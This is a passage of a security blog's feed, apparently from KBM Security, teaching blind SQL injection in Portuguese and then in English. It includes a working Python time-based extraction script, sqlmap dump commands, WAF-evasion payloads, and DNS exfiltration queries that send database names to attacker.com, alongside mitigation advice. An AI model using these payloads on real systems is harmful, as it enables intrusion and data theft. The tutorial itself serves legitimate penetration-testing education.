style="color:#ABB2BF">cols</span><span style="color:#D19A66">}</span><span style="color:#98C379">"</span><span style="color:#ABB2BF">)</span></span></code></pre> <hr> <h2 id="time-based-exploitation-manual">Time-Based Exploitation (Manual)</h2> <p>Quando não há diferença visual na resposta, use atrasos de tempo como canal de informação.</p> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="python"><code><span class="line"><span style="color:#7F848E;font-style:italic">#!/usr/bin/env python3</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># time_based_sqli.py — Time-based extractor</span></span> <span class="line"></span> <span class="line"><span style="color:#C678DD">import</span><span style="color:#ABB2BF"> requests</span></span> <span class="line"><span style="color:#C678DD">import</span><span style="color:#ABB2BF"> string</span></span> <span class="line"><span style="color:#C678DD">import</span><span style="color:#ABB2BF"> time</span></span> <span class="line"><span style="color:#C678DD">import</span><span style="color:#ABB2BF"> sys</span></span> <span class="line"></span> <span class="line"><span style="color:#D19A66">TARGET</span><span style="color:#56B6C2"> =</span><span style="color:#98C379"> "http://target.com/user"</span></span> <span class="line"><span style="color:#D19A66">PARAM</span><span style="color:#56B6C2"> =</span><span style="color:#98C379"> "id"</span></span> <span class="line"><span style="color:#D19A66">DELAY</span><span style="color:#56B6C2"> =</span><span style="color:#D19A66"> 3</span><span style="color:#7F848E;font-style:italic"> # seconds to sleep if TRUE</span></span> <span class="line"><span style="color:#D19A66">THRESHOLD</span><span style="color:#56B6C2"> =</span><span style="color:#D19A66"> 2.5</span><span style="color:#7F848E;font-style:italic"> # detection threshold</span></span> <span class="line"><span style="color:#D19A66">CHARS</span><span style="color:#56B6C2"> =</span><span style="color:#ABB2BF"> string.ascii_lowercase </span><span style="color:#56B6C2">+</span><span style="color:#ABB2BF"> string.digits </span><span style="color:#56B6C2">+</span><span style="color:#98C379"> "_-@."</span></span> <span class="line"></span> <span class="line"><span style="color:#C678DD">def</span><span style="color:#61AFEF"> inject_time</span><span style="color:#ABB2BF">(</span><span style="color:#D19A66;font-style:italic">payload</span><span style="color:#ABB2BF">: </span><span style="color:#56B6C2">str</span><span style="color:#ABB2BF">) -> </span><span style="color:#56B6C2">bool</span><span style="color:#ABB2BF">:</span></span> <span class="line"><span style="color:#98C379"> """Returns True if the response took longer than THRESHOLD."""</span></span> <span class="line"><span style="color:#ABB2BF"> full </span><span style="color:#56B6C2">=</span><span style="color:#C678DD"> f</span><span style="color:#98C379">"1 AND IF((</span><span style="color:#D19A66">{</span><span style="color:#ABB2BF">payload</span><span style="color:#D19A66">}</span><span style="color:#98C379">), SLEEP(</span><span style="color:#D19A66">{DELAY}</span><span style="color:#98C379">), 0)-- -"</span></span> <span class="line"><span style="color:#ABB2BF"> params </span><span style="color:#56B6C2">=</span><span style="color:#ABB2BF"> {</span><span style="color:#D19A66">PARAM</span><span style="color:#ABB2BF">: full}</span></span> <span class="line"><span style="color:#ABB2BF"> start </span><span style="color:#56B6C2">=</span><span style="color:#ABB2BF"> time.</span><span style="color:#61AFEF">time</span><span style="color:#ABB2BF">()</span></span> <span class="line"><span style="color:#C678DD"> try</span><span style="color:#ABB2BF">:</span></span> <span class="line"><span style="color:#ABB2BF"> requests.</span><span style="color:#61AFEF">get</span><span style="color:#ABB2BF">(</span><span style="color:#D19A66">TARGET</span><span style="color:#ABB2BF">, </span><span style="color:#E06C75;font-style:italic">params</span><span style="color:#56B6C2">=</span><span style="color:#ABB2BF">params, </span><span style="color:#E06C75;font-style:italic">timeout</span><span style="color:#56B6C2">=</span><span style="color:#D19A66">DELAY</span><span style="color:#56B6C2"> +</span><span style="color:#D19A66"> 5</span><span style="color:#ABB2BF">)</span></span> <span class="line"><span style="color:#C678DD"> except</span><span style="color:#ABB2BF"> requests.exceptions.Timeout:</span></span> <span class="line"><span style="color:#C678DD"> return</span><span style="color:#D19A66"> True</span></span> <span class="line"><span style="color:#ABB2BF"> elapsed </span><span style="color:#56B6C2">=</span><span style="color:#ABB2BF"> time.</span><span style="color:#61AFEF">time</span><span style="color:#ABB2BF">() </span><span style="color:#56B6C2">-</span><span style="color:#ABB2BF"> start</span></span> <span class="line"><span style="color:#C678DD"> return</span><span style="color:#ABB2BF"> elapsed </span><span style="color:#56B6C2">>=</span><span style="color:#D19A66"> THRESHOLD</span></span> <span class="line"></span> <span class="line"><span style="color:#C678DD">def</span><span style="color:#61AFEF"> extract_string</span><span style="color:#ABB2BF">(</span><span style="color:#D19A66;font-style:italic">query</span><span style="color:#ABB2BF">: </span><span style="color:#56B6C2">str</span><span style="color:#ABB2BF">, </span><span style="color:#D19A66;font-style:italic">max_len</span><span style="color:#ABB2BF">: </span><span style="color:#56B6C2">int</span><span style="color:#56B6C2"> =</span><span style="color:#D19A66"> 64</span><span style="color:#ABB2BF">) -> </span><span style="color:#56B6C2">str</span><span style="color:#ABB2BF">:</span></span> <span class="line"><span style="color:#ABB2BF"> result </span><span style="color:#56B6C2">=</span><span style="color:#98C379"> ""</span></span> <span class="line"><span style="color:#C678DD"> for</span><span style="color:#ABB2BF"> pos </span><span style="color:#C678DD">in</span><span style="color:#56B6C2"> range</span><span style="color:#ABB2BF">(</span><span style="color:#D19A66">1</span><span style="color:#ABB2BF">, max_len </span><span style="color:#56B6C2">+</span><span style="color:#D19A66"> 1</span><span style="color:#ABB2BF">):</span></span> <span class="line"><span style="color:#ABB2BF"> found </span><span style="color:#56B6C2">=</span><span style="color:#D19A66"> False</span></span> <span class="line"><span style="color:#C678DD"> for</span><span style="color:#ABB2BF"> ch </span><span style="color:#C678DD">in</span><span style="color:#D19A66"> CHARS</span><span style="color:#ABB2BF">:</span></span> <span class="line"><span style="color:#ABB2BF"> payload </span><span style="color:#56B6C2">=</span><span style="color:#C678DD"> f</span><span style="color:#98C379">"SUBSTRING((</span><span style="color:#D19A66">{</span><span style="color:#ABB2BF">query</span><span style="color:#D19A66">}</span><span style="color:#98C379">),</span><span style="color:#D19A66">{</span><span style="color:#ABB2BF">pos</span><span style="color:#D19A66">}</span><span style="color:#98C379">,1)='</span><span style="color:#D19A66">{</span><span style="color:#ABB2BF">ch</span><span style="color:#D19A66">}</span><span style="color:#98C379">'"</span></span> <span class="line"><span style="color:#C678DD"> if</span><span style="color:#61AFEF"> inject_time</span><span style="color:#ABB2BF">(payload):</span></span> <span class="line"><span style="color:#ABB2BF"> result </span><span style="color:#56B6C2">+=</span><span style="color:#ABB2BF"> ch</span></span> <span class="line"><span style="color:#ABB2BF"> sys.stdout.</span><span style="color:#61AFEF">write</span><span style="color:#ABB2BF">(ch)</span></span> <span class="line"><span style="color:#ABB2BF"> sys.stdout.</span><span style="color:#61AFEF">flush</span><span style="color:#ABB2BF">()</span></span> <span class="line"><span style="color:#ABB2BF"> found </span><span style="color:#56B6C2">=</span><span style="color:#D19A66"> True</span></span> <span class="line"><span style="color:#C678DD"> break</span></span> <span class="line"><span style="color:#C678DD"> if</span><span style="color:#C678DD"> not</span><span style="color:#ABB2BF"> found:</span></span> <span class="line"><span style="color:#C678DD"> break</span></span> <span class="line"><span style="color:#56B6C2"> print</span><span style="color:#ABB2BF">()</span></span> <span class="line"><span style="color:#C678DD"> return</span><span style="color:#ABB2BF"> result</span></span> <span class="line"></span> <span class="line"><span style="color:#C678DD">if</span><span style="color:#E06C75"> __name__</span><span style="color:#56B6C2"> ==</span><span style="color:#98C379"> "__main__"</span><span style="color:#ABB2BF">:</span></span> <span class="line"><span style="color:#56B6C2"> print</span><span style="color:#ABB2BF">(</span><span style="color:#98C379">"[*] Time-based extraction — this will be slow..."</span><span style="color:#ABB2BF">)</span></span> <span class="line"><span style="color:#ABB2BF"> db </span><span style="color:#56B6C2">=</span><span style="color:#61AFEF"> extract_string</span><span style="color:#ABB2BF">(</span><span style="color:#98C379">"SELECT database()"</span><span style="color:#ABB2BF">)</span></span> <span class="line"><span style="color:#56B6C2"> print</span><span style="color:#ABB2BF">(</span><span style="color:#C678DD">f</span><span style="color:#98C379">"[+] Database: </span><span style="color:#D19A66">{</span><span style="color:#ABB2BF">db</span><span style="color:#D19A66">}</span><span style="color:#98C379">"</span><span style="color:#ABB2BF">)</span></span></code></pre> <blockquote> <p><strong>NOTA:</strong> Time-based SQLi é extremamente lento para strings longas. Use binary search (ascii range) para otimizar.</p> </blockquote> <h3 id="otimização-com-binary-search">Otimização com Binary Search</h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="python"><code><span class="line"><span style="color:#C678DD">def</span><span style="color:#61AFEF"> extract_char_binary</span><span style="color:#ABB2BF">(</span><span style="color:#D19A66;font-style:italic">query</span><span style="color:#ABB2BF">: </span><span style="color:#56B6C2">str</span><span style="color:#ABB2BF">, </span><span style="color:#D19A66;font-style:italic">pos</span><span style="color:#ABB2BF">: </span><span style="color:#56B6C2">int</span><span style="color:#ABB2BF">) -> </span><span style="color:#56B6C2">str</span><span style="color:#ABB2BF">:</span></span> <span class="line"><span style="color:#98C379"> """Extract a single character using binary search on ASCII value."""</span></span> <span class="line"><span style="color:#ABB2BF"> lo, hi </span><span style="color:#56B6C2">=</span><span style="color:#D19A66"> 32</span><span style="color:#ABB2BF">, </span><span style="color:#D19A66">126</span><span style="color:#7F848E;font-style:italic"> # printable ASCII range</span></span> <span class="line"><span style="color:#C678DD"> while</span><span style="color:#ABB2BF"> lo </span><span style="color:#56B6C2">&#x3C;</span><span style="color:#ABB2BF"> hi:</span></span> <span class="line"><span style="color:#ABB2BF"> mid </span><span style="color:#56B6C2">=</span><span style="color:#ABB2BF"> (lo </span><span style="color:#56B6C2">+</span><span style="color:#ABB2BF"> hi) </span><span style="color:#56B6C2">//</span><span style="color:#D19A66"> 2</span></span> <span class="line"><span style="color:#ABB2BF"> payload </span><span style="color:#56B6C2">=</span><span style="color:#C678DD"> f</span><span style="color:#98C379">"ASCII(SUBSTRING((</span><span style="color:#D19A66">{</span><span style="color:#ABB2BF">query</span><span style="color:#D19A66">}</span><span style="color:#98C379">),</span><span style="color:#D19A66">{</span><span style="color:#ABB2BF">pos</span><span style="color:#D19A66">}</span><span style="color:#98C379">,1))></span><span style="color:#D19A66">{</span><span style="color:#ABB2BF">mid</span><span style="color:#D19A66">}</span><span style="color:#98C379">"</span></span> <span class="line"><span style="color:#C678DD"> if</span><span style="color:#61AFEF"> inject_time</span><span style="color:#ABB2BF">(payload):</span></span> <span class="line"><span style="color:#ABB2BF"> lo </span><span style="color:#56B6C2">=</span><span style="color:#ABB2BF"> mid </span><span style="color:#56B6C2">+</span><span style="color:#D19A66"> 1</span></span> <span class="line"><span style="color:#C678DD"> else</span><span style="color:#ABB2BF">:</span></span> <span class="line"><span style="color:#ABB2BF"> hi </span><span style="color:#56B6C2">=</span><span style="color:#ABB2BF"> mid</span></span> <span class="line"><span style="color:#C678DD"> return</span><span style="color:#56B6C2"> chr</span><span style="color:#ABB2BF">(lo) </span><span style="color:#C678DD">if</span><span style="color:#D19A66"> 32</span><span style="color:#56B6C2"> &#x3C;=</span><span style="color:#ABB2BF"> lo </span><span style="color:#56B6C2">&#x3C;=</span><span style="color:#D19A66"> 126</span><span style="color:#C678DD"> else</span><span style="color:#98C379"> ''</span></span></code></pre> <hr> <h2 id="usando-sqlmap">Usando sqlmap</h2> <p>Para automação profissional, o <strong>sqlmap</strong> é a ferramenta padrão.</p> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#7F848E;font-style:italic"># Detecção básica</span></span> <span class="line"><span style="color:#61AFEF">sqlmap</span><span style="color:#D19A66"> -u</span><span style="color:#98C379"> "http://target.com/user?id=1"</span><span style="color:#D19A66"> --batch</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Forçar técnicas específicas</span></span> <span class="line"><span style="color:#61AFEF">sqlmap</span><span style="color:#D19A66"> -u</span><span style="color:#98C379"> "http://target.com/user?id=1"</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#D19A66"> --technique=BT</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#D19A66"> --batch</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#D19A66"> --level=3</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#D19A66"> --risk=2</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Extrair banco, tabelas e dump</span></span> <span class="line"><span style="color:#61AFEF">sqlmap</span><span style="color:#D19A66"> -u</span><span style="color:#98C379"> "http://target.com/user?id=1"</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#D19A66"> --dbs</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#D19A66"> --batch</span></span> <span class="line"></span> <span class="line"><span style="color:#61AFEF">sqlmap</span><span style="color:#D19A66"> -u</span><span style="color:#98C379"> "http://target.com/user?id=1"</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#D19A66"> -D</span><span style="color:#98C379"> target_db</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#D19A66"> --tables</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#D19A66"> --batch</span></span> <span class="line"></span> <span class="line"><span style="color:#61AFEF">sqlmap</span><span style="color:#D19A66"> -u</span><span style="color:#98C379"> "http://target.com/user?id=1"</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#D19A66"> -D</span><span style="color:#98C379"> target_db</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#D19A66"> -T</span><span style="color:#98C379"> users</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#D19A66"> --dump</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#D19A66"> --batch</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Via POST request</span></span> <span class="line"><span style="color:#61AFEF">sqlmap</span><span style="color:#D19A66"> -u</span><span style="color:#98C379"> "http://target.com/login"</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#D19A66"> --data=</span><span style="color:#98C379">"username=admin&#x26;password=test"</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#D19A66"> -p</span><span style="color:#98C379"> username</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#D19A66"> --batch</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Via Burp intercepted request</span></span> <span class="line"><span style="color:#61AFEF">sqlmap</span><span style="color:#D19A66"> -r</span><span style="color:#98C379"> request.txt</span><span style="color:#D19A66"> --batch</span><span style="color:#D19A66"> --level=5</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Com cookie de sessão autenticado</span></span> <span class="line"><span style="color:#61AFEF">sqlmap</span><span style="color:#D19A66"> -u</span><span style="color:#98C379"> "http://target.com/profile?id=1"</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#D19A66"> --cookie=</span><span style="color:#98C379">"session=abc123; csrftoken=xyz"</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#D19A66"> --batch</span></span></code></pre> <h3 id="sqlmap-com-proxy-burp-suite">sqlmap com proxy (Burp Suite)</h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#61AFEF">sqlmap</span><span style="color:#D19A66"> -u</span><span style="color:#98C379"> "http://target.com/user?id=1"</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#D19A66"> --proxy=</span><span style="color:#98C379">"http://127.0.0.1:8080"</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#D19A66"> --batch</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#D19A66"> --tamper=space2comment,randomcase</span></span></code></pre> <hr> <h2 id="bypass-de-waf">Bypass de WAF</h2> <h3 id="tamper-scripts-úteis-do-sqlmap">Tamper scripts úteis do sqlmap</h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#7F848E;font-style:italic"># Espaço → comentário SQL</span></span> <span class="line"><span style="color:#E06C75">--tamper</span><span style="color:#56B6C2">=</span><span style="color:#98C379">space2comment</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Case aleatório: SELECT → SeLeCt</span></span> <span class="line"><span style="color:#E06C75">--tamper</span><span style="color:#56B6C2">=</span><span style="color:#98C379">randomcase</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Encode URL dos payloads</span></span> <span class="line"><span style="color:#E06C75">--tamper</span><span style="color:#56B6C2">=</span><span style="color:#98C379">percentage</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Combinar múltiplos tampers</span></span> <span class="line"><span style="color:#E06C75">--tamper</span><span style="color:#56B6C2">=</span><span style="color:#98C379">space2comment,randomcase,between</span></span></code></pre> <h3 id="payloads-ofuscados-manualmente">Payloads ofuscados manualmente</h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="sql"><code><span class="line"><span style="color:#7F848E;font-style:italic">-- Espaços substituídos por comentários</span></span> <span class="line"><span style="color:#D19A66">1</span><span style="color:#7F848E;font-style:italic">/**/</span><span style="color:#C678DD">AND</span><span style="color:#7F848E;font-style:italic">/**/</span><span style="color:#D19A66">1</span><span style="color:#56B6C2">=</span><span style="color:#D19A66">1</span><span style="color:#7F848E;font-style:italic">--</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic">-- Inline comments para separar keywords</span></span> <span class="line"><span style="color:#D19A66">1</span><span style="color:#7F848E;font-style:italic"> /*!AND*/</span><span style="color:#D19A66"> 1</span><span style="color:#56B6C2">=</span><span style="color:#D19A66">1</span><span style="color:#7F848E;font-style:italic">--</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic">-- Hex encoding de strings</span></span> <span class="line"><span style="color:#D19A66">1</span><span style="color:#C678DD"> AND</span><span style="color:#56B6C2"> SUBSTRING</span><span style="color:#ABB2BF">(</span><span style="color:#C678DD">database</span><span style="color:#ABB2BF">(),</span><span style="color:#D19A66">1</span><span style="color:#ABB2BF">,</span><span style="color:#D19A66">1</span><span style="color:#ABB2BF">)</span><span style="color:#56B6C2">=</span><span style="color:#ABB2BF">0x64</span><span style="color:#7F848E;font-style:italic">--</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic">-- Double URL encoding (para WAFs que decodificam uma vez)</span></span> <span class="line"><span style="color:#ABB2BF">%</span><span style="color:#D19A66">2527</span><span style="color:#ABB2BF"> → %</span><span style="color:#D19A66">27</span><span style="color:#ABB2BF"> → </span><span style="color:#98C379">'</span></span></code></pre> <hr> <h2 id="out-of-band-oob-exfiltration">Out-of-Band (OOB) Exfiltration</h2> <p>Quando ambos boolean e time-based estão bloqueados, exfiltre via DNS ou HTTP.</p> <h3 id="mysql--dns-exfiltration">MySQL — DNS Exfiltration</h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="sql"><code><span class="line"><span style="color:#7F848E;font-style:italic">-- Exige FILE privilege e resolução DNS externa</span></span> <span class="line"><span style="color:#C678DD">SELECT</span><span style="color:#ABB2BF"> LOAD_FILE(</span><span style="color:#56B6C2">CONCAT</span><span style="color:#ABB2BF">(</span><span style="color:#98C379">'\\\\'</span><span style="color:#ABB2BF">,</span></span> <span class="line"><span style="color:#ABB2BF"> (</span><span style="color:#C678DD">SELECT</span><span style="color:#C678DD"> database</span><span style="color:#ABB2BF">()),</span></span> <span class="line"><span style="color:#98C379"> '.attacker.com\\share'</span><span style="color:#ABB2BF">))</span><span style="color:#7F848E;font-style:italic">--</span></span></code></pre> <h3 id="mssql--xp_dirtree-dns">MSSQL — xp_dirtree DNS</h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="sql"><code><span class="line"><span style="color:#7F848E;font-style:italic">-- Via xp_dirtree (não precisa de xp_cmdshell)</span></span> <span class="line"><span style="color:#C678DD">EXEC</span><span style="color:#D19A66"> master</span><span style="color:#ABB2BF">.</span><span style="color:#D19A66">dbo</span><span style="color:#ABB2BF">.xp_dirtree</span></span> <span class="line"><span style="color:#98C379"> '\\'</span><span style="color:#ABB2BF"> + (</span><span style="color:#C678DD">SELECT</span><span style="color:#C678DD"> TOP</span><span style="color:#D19A66"> 1</span><span style="color:#ABB2BF"> table_name </span><span style="color:#C678DD">FROM</span><span style="color:#D19A66"> information_schema</span><span style="color:#ABB2BF">.</span><span style="color:#D19A66">tables</span><span style="color:#ABB2BF">) + </span><span style="color:#98C379">'.attacker.com\x'</span><span style="color:#7F848E;font-style:italic">--</span></span></code></pre> <h3 id="capturando-com-interactsh-ou-burp-collaborator">Capturando com interactsh ou Burp Collaborator</h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#7F848E;font-style:italic"># Iniciar listener com interactsh-client</span></span> <span class="line"><span style="color:#61AFEF">interactsh-client</span><span style="color:#D19A66"> -v</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Sua URL de callback fica em: xxxx.interactsh.com</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Use no payload:</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># ' AND LOAD_FILE(CONCAT('\\\\', database(), '.xxxx.interactsh.com\\x'))--</span></span></code></pre> <hr> <h2 id="mitigação">Mitigação</h2> <table><thead><tr><th>Vetor</th><th>Controle Recomendado</th></tr></thead><tbody><tr><td>Query dinâmica</td><td>Usar <strong>Prepared Statements</strong> / Parameterized Queries</td></tr><tr><td>ORM inseguro</td><td>Evitar raw queries; usar ORMs com bind parameters</td></tr><tr><td>Erros verbosos</td><td>Desabilitar stack traces em produção</td></tr><tr><td>Ausência de WAF</td><td>Implementar WAF com regras OWASP CRS</td></tr><tr><td>Permissões excessivas</td><td>DB user deve ter apenas SELECT nas tabelas necessárias</td></tr><tr><td>OOB via DNS</td><td>Bloquear resolução DNS de saída no servidor DB</td></tr></tbody></table> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="python"><code><span class="line"><span style="color:#7F848E;font-style:italic"># SEGURO: Parameterized query em Python (psycopg2)</span></span> <span class="line"><span style="color:#C678DD">import</span><span style="color:#ABB2BF"> psycopg2</span></span> <span class="line"></span> <span class="line"><span style="color:#ABB2BF">conn </span><span style="color:#56B6C2">=</span><span style="color:#ABB2BF"> psycopg2.</span><span style="color:#61AFEF">connect</span><span style="color:#ABB2BF">(</span><span style="color:#98C379">"dbname=app user=readonly"</span><span style="color:#ABB2BF">)</span></span> <span class="line"><span style="color:#ABB2BF">cur </span><span style="color:#56B6C2">=</span><span style="color:#ABB2BF"> conn.</span><span style="color:#61AFEF">cursor</span><span style="color:#ABB2BF">()</span></span> <span class="line"></span> <span class="line"><span style="color:#ABB2BF">user_id </span><span style="color:#56B6C2">=</span><span style="color:#ABB2BF"> request.args.</span><span style="color:#61AFEF">get</span><span style="color:#ABB2BF">(</span><span style="color:#98C379">"id"</span><span style="color:#ABB2BF">)</span></span> <span class="line"><span style="color:#ABB2BF">cur.</span><span style="color:#61AFEF">execute</span><span style="color:#ABB2BF">(</span><span style="color:#98C379">"SELECT username FROM users WHERE id = </span><span style="color:#D19A66">%s</span><span style="color:#98C379">"</span><span style="color:#ABB2BF">, (user_id,))</span></span> <span class="line"><span style="color:#ABB2BF">row </span><span style="color:#56B6C2">=</span><span style="color:#ABB2BF"> cur.</span><span style="color:#61AFEF">fetchone</span><span style="color:#ABB2BF">()</span></span></code></pre> <hr> <h2 id="referências">Referências</h2> <ul> <li><a href="https://owasp.org/www-community/attacks/SQL_Injection">OWASP SQL Injection</a></li> <li><a href="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection">PayloadsAllTheThings — SQLi</a></li> <li><a href="https://sqlmap.org/">sqlmap documentation</a></li> <li><a href="https://portswigger.net/web-security/sql-injection/blind">PortSwigger Web Security Academy</a></li> </ul> <blockquote> <p><strong>AVISO LEGAL:</strong> Este conteúdo é destinado exclusivamente a profissionais de segurança autorizados. O uso destas técnicas em sistemas sem autorização explícita é ilegal. KBM Security não se responsabiliza pelo uso indevido.</p> </blockquote>redteam@kbmsecurity.com.brwebsqliblindwebdatabaseboolean-basedtime-basedsqlmaphardBlind SQL Injection — Extracting Data Without Seeing the Outputhttps://www.kbmsecurity.com.br/blog/post/sql-injection-blind-en/https://www.kbmsecurity.com.br/blog/post/sql-injection-blind-en/Blind SQL Injection exploitation techniques (boolean-based and time-based) for data extraction when the application returns no visible errors.Mon, 10 Feb 2025 00:00:00 GMT<h2 id="what-is-blind-sql-injection">What is Blind SQL Injection?</h2> <p><strong>Blind SQL Injection</strong> occurs when an application is vulnerable to SQL Injection, but <strong>does not return query results</strong> or error messages in the HTTP response. The attacker must infer the database content based on indirect application behaviors.</p> <p>There are two main types:</p> <table><thead><tr><th>Type</th><th>Mechanism</th><th>Speed</th></tr></thead><tbody><tr><td>Boolean-based</td><td>Evaluates TRUE/FALSE in the response</td><td>Slow</td></tr><tr><td>Time-based</td><td>Measures response delay (SLEEP)</td><td>Very slow</td></tr><tr><td>Error-based</td><td>Causes errors with embedded data</td><td>Fast</td></tr><tr><td>Out-of-band</td><td>Exfiltration via DNS/HTTP</td><td>Fast</td></tr></tbody></table> <hr> <h2 id="identifying-the-vulnerability">Identifying the vulnerability</h2> <h3 id="basic-injection-test">Basic injection test</h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="http"><code><span class="line"><span style="color:#C678DD">GET</span><span style="color:#ABB2BF"> /user?id=1 </span><span style="color:#C678DD">HTTP</span><span style="color:#ABB2BF">/</span><span style="color:#D19A66">1.1</span></span> <span class="line"><span style="color:#E06C75">Host</span><span style="color:#C678DD">:</span><span style="color:#98C379"> target.com</span></span></code></pre> <p>Inject Boolean conditions and observe differences in response:</p> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="plaintext"><code><span class="line"><span># TRUE condition — normal response</span></span> <span class="line"><span>/user?id=1 AND 1=1--</span></span> <span class="line"><span></span></span> <span class="line"><span># FALSE condition — different response (no content, redirect, etc.)</span></span> <span class="line"><span>/user?id=1 AND 1=2--</span></span></code></pre> <p>If the responses are <strong>visibly different</strong> between TRUE and FALSE, the endpoint is vulnerable to boolean-based blind SQLi.</p> <h3 id="time-based-test">Time-based test</h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="plaintext"><code><span class="line"><span># MySQL / MariaDB</span></span> <span class="line"><span>/user?id=1 AND SLEEP(5)--</span></span> <span class="line"><span></span></span> <span class="line"><span># PostgreSQL</span></span> <span class="line"><span>/user?id=1 AND pg_sleep(5)--</span></span> <span class="line"><span></span></span> <span class="line"><span># MSSQL</span></span> <span class="line"><span>/user?id=1; WAITFOR DELAY &#x26;#x27;0:0:5&#x26;#x27;--</span></span> <span class="line"><span></span></span> <span class="line"><span># Oracle</span></span> <span class="line"><span>/user?id=1 AND 1=DBMS_PIPE.RECEIVE_MESSAGE(&#x26;#x27;a&#x26;#x27;,5)--</span></span></code></pre> <p>If the response takes exactly <strong>5 seconds</strong>, the backend is vulnerable.</p> <hr> <h2 id="boolean-based-exploitation-manual">Boolean-Based Exploitation (Manual)</h2> <p>The technique consists of asking <strong>yes/no</strong> questions to the database, extracting one character at a time.</p> <h3 id="identifying-the-database">Identifying the database</h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="sql"><code><span class="line"><span style="color:#7F848E;font-style:italic">-- MySQL</span></span> <span class="line"><span style="color:#D19A66">1</span><span style="color:#C678DD"> AND</span><span style="color:#56B6C2"> SUBSTRING</span><span style="color:#ABB2BF">(@@</span><span style="color:#C678DD">version</span><span style="color:#ABB2BF">,</span><span style="color:#D19A66">1</span><span style="color:#ABB2BF">,</span><span style="color:#D19A66">1</span><span style="color:#ABB2BF">)</span><span style="color:#56B6C2">=</span><span style="color:#ABB2BF">&#x26;#x27;</span><span style="color:#D19A66">5</span><span style="color:#ABB2BF">&#x26;#x27;</span><span style="color:#7F848E;font-style:italic">--</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic">-- PostgreSQL</span></span> <span class="line"><span style="color:#D19A66">1</span><span style="color:#C678DD"> AND</span><span style="color:#56B6C2"> SUBSTRING</span><span style="color:#ABB2BF">(</span><span style="color:#C678DD">version</span><span style="color:#ABB2BF">(),</span><span style="color:#D19A66">1</span><span style="color:#ABB2BF">,</span><span style="color:#D19A66">10</span><span 